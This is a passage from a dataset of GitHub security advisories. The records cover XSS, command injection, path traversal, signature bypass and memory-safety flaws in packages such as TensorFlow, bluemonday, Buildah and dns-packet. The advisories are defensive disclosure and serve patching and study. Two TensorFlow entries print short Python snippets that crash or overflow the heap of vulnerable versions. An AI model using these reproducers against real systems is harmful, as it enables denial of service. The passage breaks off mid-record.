defeating a protection mechanism against the ""script"" string.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/microcosm-cc/bluemonday'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29272'}, {'type': 'WEB', 'url': 'https://github.com/microcosm-cc/bluemonday/issues/111'}, {'type': 'WEB', 'url': 'https://github.com/microcosm-cc/bluemonday/commit/524f142fe46e945b7dcd291d7805c4b7dcf75bee'}, {'type': 'WEB', 'url': 'https://github.com/microcosm-cc/bluemonday/releases/tag/v1.0.5'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0762'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/4'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/4.txt'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:05:51Z', 'nvd_published_at': None}" +1.4.0,GHSA-jcgr-9698-82jx,2021-05-27T21:05:29Z,2021-05-28T15:53:40Z,,[],Improper Neutralization of Special Elements used in a Command ('Command Injection') in @floffah/build,"### Impact +If you are using the esbuild target or command you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. + +### Patches +The problem has been patched in v1.0.0 as it uses a proper method to pass configs to esbuild/estrella. + +### Workarounds +There is no work around. You should update asap. + +### Notes +This notice is mainly just to make sure people update to the latest version. This isn't that bad, but should encourage you to update.",[],"[{'package': {'ecosystem': 'npm', 'name': '@floffah/build'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Floffah/build/security/advisories/GHSA-jcgr-9698-82jx'}]","{'cwe_ids': ['CWE-77'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:05:29Z', 'nvd_published_at': None}" +1.4.0,GHSA-hmg3-c7xj-6qwm,2021-05-18T21:48:53Z,2021-05-21T14:23:25Z,,['CVE-2021-29545'],Heap buffer overflow in `SparseTensorToCSRSparseMatrix`,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in converting sparse tensors to CSR Sparse matrices: + +```python +import tensorflow as tf +import numpy as np +from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops + +indices_array = np.array([[0, 0]]) +value_array = np.array([0.0], dtype=np.float32) +dense_shape = [0, 0] + +st = tf.SparseTensor(indices_array, value_array, dense_shape) + +values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( + st.indices, st.values, st.dense_shape) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/800346f2c03a27e182dd4fba48295f65e7790739/tensorflow/core/kernels/sparse/kernels.cc#L66) does a double redirection to access an element of an array allocated on the heap: + +```cc +csr_row_ptr(indices(i, 0) + 1) += 1; +``` + +If the value at `indices(i, 0)` is such that `indices(i, 0) + 1` is outside the bounds of `csr_row_ptr`, this results in writing outside of bounds of heap allocated data. + +### Patches +We have patched the issue in GitHub commit [1e922ccdf6bf46a3a52641f99fd47d54c1decd13](https://github.com/tensorflow/tensorflow/commit/1e922ccdf6bf46a3a52641f99fd47d54c1decd13). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hmg3-c7xj-6qwm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29545'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1e922ccdf6bf46a3a52641f99fd47d54c1decd13'}]","{'cwe_ids': ['CWE-131'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:48:53Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-m898-h4pm-pqfr,2021-05-21T21:22:50Z,2021-05-25T18:44:09Z,,['CVE-2021-28955'],Arbitrary code execution due to an uncontrolled search path for the git binary,"### Impact + +The go language recently addressed a security issue in the way that binaries are found before being executed. Some operating systems like Windows persist to have the current directory being part of the default search path, and having priority over the system-wide path. + +This means that it's possible for a malicious user to craft for example a `git.bat` command, commit it and push it in a repository. Later when git-bug search for the git binary, this malicious executable can take priority and be executed. + +### Who is impacted + +This issue happen on Windows and some other operating systems with a badly configured PATH. + +All version prior to 0.7.2 are vulnerable to this issue. + +### Patches + +Version 0.7.2 fix this issue. Users should update as soon as possible. + +### References + +More details about this issue can be found [here](https://blog.golang.org/path-security).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/MichaelMure/git-bug'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/MichaelMure/git-bug/repository'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MichaelMure/git-bug/security/advisories/GHSA-m898-h4pm-pqfr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28955'}, {'type': 'WEB', 'url': 'https://github.com/MichaelMure/git-bug/pull/604'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/18'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:22:50Z', 'nvd_published_at': '2021-03-22T07:15:00Z'}" +1.4.0,GHSA-jv9c-w74q-6762,2021-05-24T16:53:16Z,2021-05-24T16:56:23Z,,['CVE-2020-25040'],Insecure permissions on build temporary rootfs in Singularity,"### Impact + +Insecure permissions on temporary directories used in explicit and implicit container build operations. + +When a Singularity command that results in a container build operation is executed, it is possible for a user with access to the system to read the contents of the image during the build. Additionally, if the image contains a world-writable file or directory, it is possible for a user to inject arbitrary content into the running build, which in certain circumstances may enable arbitrary code execution during the build and/or when the built container is run. + +### Patches + +This issue is addressed in Singularity 3.6.3. + +All users are advised to upgrade to 3.6.3. + +### Workarounds + +The issue is mitigated if `TMPDIR` is set to a location that is only accessible to the user, as any subdirectories directly under `TMPDIR` cannot then be accessed by others. However, this is difficult to enforce so it is not recommended to rely on this as a mitigation. + +### For more information + +General questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the: + +* [Singularity Slack Channel](https://bit.ly/2m0g3lX) +* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity) + +Any sensitive security concerns should be directed to: security@sylabs.io + +See our Security Policy here: https://sylabs.io/security-policy","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-jv9c-w74q-6762'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25040'}, {'type': 'WEB', 'url': 'https://medium.com/sylabs'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00070.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00088.html'}]","{'cwe_ids': ['CWE-668', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T16:53:16Z', 'nvd_published_at': '2020-09-16T18:15:00Z'}" +1.4.0,GHSA-q547-gmf8-8jr7,2023-08-29T23:34:28Z,2021-05-24T16:57:32Z,,['CVE-2020-15216'],github.com/russellhaering/goxmldsig vulnerable to Signature Validation Bypass,"### Impact +With a carefully crafted XML file, an attacker can completely bypass signature validation and pass off an altered file as a signed one. + +### Patches +A patch is available, all users of goxmldsig should upgrade to v1.1.0. + +### For more information +If you have any questions or comments about this advisory open an issue at https://github.com/russellhaering/goxmldsig","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/russellhaering/goxmldsig'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15216'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/goxmldsig/commit/f6188febf0c29d7ffe26a0436212b19cb9615e64'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GUH33FPUXED3FHYL25BJOQPRKFGPOMS2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZECBFD4M4PHBMBOCMSQ537NOU37QOVWP/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/github.com/russellhaering/goxmldsig?tab=overview'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0050'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T12:54:31Z', 'nvd_published_at': '2020-09-29T16:15:00Z'}" +1.4.0,GHSA-fx8w-mjvm-hvpc,2023-09-29T17:22:03Z,2021-05-18T18:32:41Z,,['CVE-2020-10696'],Path Traversal in Buildah,"A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions. + +### Specific Go Packages Affected +github.com/containers/buildah/imagebuildah","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10696'}, {'type': 'WEB', 'url': 'https://github.com/containers/buildah/pull/2245'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2020-10696'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1817651'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10696'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T17:31:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-4f68-49qq-h392,2023-09-05T21:47:52Z,2021-05-24T18:12:20Z,,['CVE-2020-13163'],Improper certificate validation in em-imap,em-imap 0.5 and earlier use the library eventmachine in an insecure way that allows an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'em-imap'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13163'}, {'type': 'WEB', 'url': 'https://github.com/ConradIrwin/em-imap/issues/25'}, {'type': 'PACKAGE', 'url': 'https://github.com/ConradIrwin/em-imap'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-095-conradirwin-em-imap'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:25:15Z', 'nvd_published_at': '2020-05-19T22:15:00Z'}" +1.4.0,GHSA-8p9r-f949-699g,2022-10-20T13:54:04Z,2021-05-10T18:46:48Z,,['CVE-2020-7758'],Path Traversal in browserless-chrome,This affects all versions of browserless-chrome before 1.43.0. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'browserless-chrome'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.43.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7758'}, {'type': 'WEB', 'url': 'https://github.com/browserless/chrome/commit/848b87e5bea4f8473eea85261a5ff922d6ebd2b6'}, {'type': 'PACKAGE', 'url': 'https://github.com/browserless/chrome'}, {'type': 'WEB', 'url': 'https://github.com/browserless/chrome/blob/master/src/routes.ts%23L175'}, {'type': 'WEB', 'url': 'https://github.com/browserless/chrome/releases/tag/1.40.2-chrome-stable'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BROWSERLESSCHROME-1023657'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/browserless-chrome'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:41:52Z', 'nvd_published_at': '2020-11-02T22:15:00Z'}" +1.4.0,GHSA-x5c7-x7m2-rhmf,2021-05-20T16:50:13Z,2021-05-20T16:50:34Z,,[],Local directory executable lookup in sops (Windows-only),"### Impact +Windows users using the sops direct editor option (`sops file.yaml`) can have a local executable named either `vi`, `vim`, or `nano` executed if running sops from `cmd.exe` + +This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As well, this attack will only work when using `cmd.exe` or the Windows C library [SearchPath function](https://docs.microsoft.com/en-us/windows/win32/api/processenv/nf-processenv-searchpatha). This is a result of these Windows tools including `.` within their `PATH` by default. + +**If you are using sops within untrusted directories on Windows via `cmd.exe`, please upgrade immediately** + +**As well, if you have `.` within your default $PATH, please upgrade immediately.** + +More information can be found on the official Go blog: https://blog.golang.org/path-security + +### Patches +The problem has been resolved in v3.7.1 + +Now, if Windows users using cmd.exe run into this issue, a warning message will be printed: +`vim resolves to executable in current directory (.\vim.exe)` + +### References +* https://blog.golang.org/path-security + +### For more information +If you have any questions or comments about this advisory: +* Open a discussion in [sops](https://github.com/mozilla/sops/discussions)",[],"[{'package': {'ecosystem': 'Go', 'name': 'go.mozilla.org/sops/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mozilla/sops/security/advisories/GHSA-x5c7-x7m2-rhmf'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:50:13Z', 'nvd_published_at': None}" +1.4.0,GHSA-3c6g-pvg8-gqw2,2023-09-11T20:29:18Z,2021-05-06T18:11:21Z,,['CVE-2020-7712'],trentm/json vulnerable to command injection,This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.0.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:json'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '9.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7712'}, {'type': 'WEB', 'url': 'https://github.com/trentm/json/issues/144'}, {'type': 'WEB', 'url': 'https://github.com/trentm/json/pull/145'}, {'type': 'WEB', 'url': 'https://github.com/trentm/json/commit/cc4798169f9e0f181f8aa61905b88479badcd483'}, {'type': 'PACKAGE', 'url': 'https://github.com/trentm/json'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37c0e1807da7ff2bdd028bbe296465a6bbb99e2320dbe661d5d8b33b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b04f4e99a19613f88ae088aa18cd271231a3c79dfff8f5efa8cda61@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f17bfca1d6e7f4b33ae978725b2fd62a9f1b3111696eafa9add802d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d2e174230f6d26e16c007546e804c343f1f68956f526daaafa4aaae@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r977a907ecbedf87ae5ba47d4c77639efb120f74d4d1b3de14a4ef4da@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9c6d28e5b9a9b3481b7d1f90f1c2f75cd1a5ade91038426e0fb095da@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra890c24b3d90be36daf48ae76b263acb297003db24c1122f8e4aaef2@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb023d54a46da1ac0d8969097f5fecc79636b07d3b80db7b818a5c55c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2b981912446a74e14fe6076c4b7c7d8502727ea0718e6a65a9b1be5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb89bd82dffec49f83b49e9ad625b1b63a408b3c7d1a60d6f049142a0@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba7ea4d75d6a8e5b935991d960d9b893fd30e576c4d3b531084ebd7d@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd9b9cc843f5cf5b532bdad9e87a817967efcf52b917e8c43b6df4cc7@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec8bb4d637b04575da41cfae49118e108e95d43bfac39b7b698ee4db@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree3abcd33c06ee95ab59faa1751198a1186d8941ddc2c2562c12966c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-608931'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSON-597481'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:43:27Z', 'nvd_published_at': '2020-08-30T08:15:00Z'}" +1.4.0,GHSA-xr8h-53xr-jhcm,2021-05-06T18:59:36Z,2021-05-07T16:06:43Z,,['CVE-2020-7682'],Path Traversal in marked-tree,This affects all versions up to and including version 0.8.1 of package marked-tree. There is no path sanitization in the path provided at fs.readFile in index.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'marked-tree'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7682'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MARKEDTREE-590121'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T18:59:36Z', 'nvd_published_at': '2020-07-25T09:15:00Z'}" +1.4.0,GHSA-3wcq-x3mq-6r9p,2021-05-26T20:11:00Z,2021-05-24T19:51:04Z,,['CVE-2021-23386'],Potential memory exposure in dns-packet,This affects the package dns-packet before versions 1.3.2 and 5.2.2. It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over unencrypted network when querying crafted invalid domain names.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'dns-packet'}, 'ecosystem_specific': {'affected_functions': ['dns-packet.encodingLength']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '5.4.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dns-packet'}, 'ecosystem_specific': {'affected_functions': ['dns-packet.encodingLength']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23386'}, {'type': 'WEB', 'url': 'https://github.com/mafintosh/dns-packet/commit/0d0d593f8df4e2712c43957a6c62e95047f12b2d'}, {'type': 'WEB', 'url': 'https://github.com/mafintosh/dns-packet/commit/25f15dd0fedc53688b25fd053ebbdffe3d5c1c56'}, {'type': 'WEB', 'url': 'https://hackerone.com/bugs?subject=user&%3Breport_id=968858'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1295719'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DNSPACKET-1293563'}]","{'cwe_ids': ['CWE-200', 'CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:07:04Z', 'nvd_published_at': '2021-05-20T17:15:00Z'}" +1.4.0,GHSA-v6r6-84gr-92rm,2021-05-18T18:12:31Z,2021-05-21T14:26:18Z,,['CVE-2021-29577'],Heap buffer overflow in `AvgPool3DGrad`,"### Impact +The implementation of `tf.raw_ops.AvgPool3DGrad` is vulnerable to a heap buffer overflow: + +```python +import tensorflow as tf + +orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) +grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) +ksize = [1, 1, 1, 1, 1] +strides = [1, 1, 1, 1, 1] +padding = ""SAME"" + +tf.raw_ops.AvgPool3DGrad( + orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, + padding=padding) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/d80ffba9702dc19d1fac74fc4b766b3fa1ee976b/tensorflow/core/kernels/pooling_ops_3d.cc#L376-L450) assumes that the `orig_input_shape` and `grad` tensors have similar first and last dimensions but does not check that this assumption is validated. + +### Patches +We have patched the issue in GitHub commit [6fc9141f42f6a72180ecd24021c3e6b36165fe0d](https://github.com/tensorflow/tensorflow/commit/6fc9141f42f6a72180ecd24021c3e6b36165fe0d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 